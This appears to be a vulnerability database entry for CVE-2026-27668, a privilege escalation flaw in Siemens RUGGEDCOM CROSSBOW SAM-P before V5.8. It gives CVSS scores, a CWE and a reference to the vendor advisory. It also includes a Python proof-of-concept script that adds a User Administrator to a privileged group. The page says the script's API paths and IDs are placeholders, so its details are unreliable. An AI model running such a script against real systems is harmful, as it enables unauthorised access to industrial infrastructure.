Security Vulnerability Report
CVE-2026-27668 CVSS 8.8 HIGH

Published: 2026-04-14 09:16:35
Last Modified: 2026-04-17 15:18:17

Description

A vulnerability has been identified in RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) (All versions < V5.8). User Administrators are allowed to administer groups they belong to. This could allow an authenticated User Administrator to escalate their own privileges and grant themselves access to any device group at any access level.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 (Secondary)
8.7 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Weakness
CWE-266 (Incorrect Privilege Assignment)

Configurations (Affected Products)

RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) < V5.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The API paths, group ID and user ID it uses are placeholders; none of them come from the Siemens advisory.

```python
import requests

# Target configuration
TARGET_HOST = "https://<target-ip>"
LOGIN_API = f"{TARGET_HOST}/api/login"
GROUP_API = f"{TARGET_HOST}/api/groups"

# Credentials for a low-privileged User Administrator
USERNAME = "user_admin"
PASSWORD = "password"


def exploit():
    session = requests.Session()

    # Step 1: Authenticate as the User Administrator
    print("[*] Attempting to login...")
    login_payload = {"username": USERNAME, "password": PASSWORD}
    response = session.post(LOGIN_API, json=login_payload, verify=False)
    if response.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Login successful")

    # Step 2: Identify the target high-privilege group (e.g., ID 1 for Super Admins)
    # and the current user's ID (assuming ID 101)
    target_group_id = 1
    attacker_user_id = 101

    # Step 3: Exploit the vulnerability to add user to the privileged group
    # The vulnerability allows User Admins to modify groups they belong to,
    # but logic fails to prevent escalating to groups they shouldn't fully control.
    exploit_payload = {
        "action": "add_member",
        "group_id": target_group_id,
        "user_id": attacker_user_id,
    }
    print(f"[*] Attempting to escalate privileges by adding user {attacker_user_id} to group {target_group_id}...")
    exploit_response = session.post(GROUP_API, json=exploit_payload, verify=False)
    if exploit_response.status_code == 200:
        print("[+] Exploit successful! Privileges escalated.")
    else:
        print("[-] Exploit failed. Check permissions or API endpoint.")


if __name__ == "__main__":
    exploit()
```

References

Siemens ProductCERT advisory SSA-741509: https://cert-portal.siemens.com/productcert/html/ssa-741509.html
Raw JSON Data
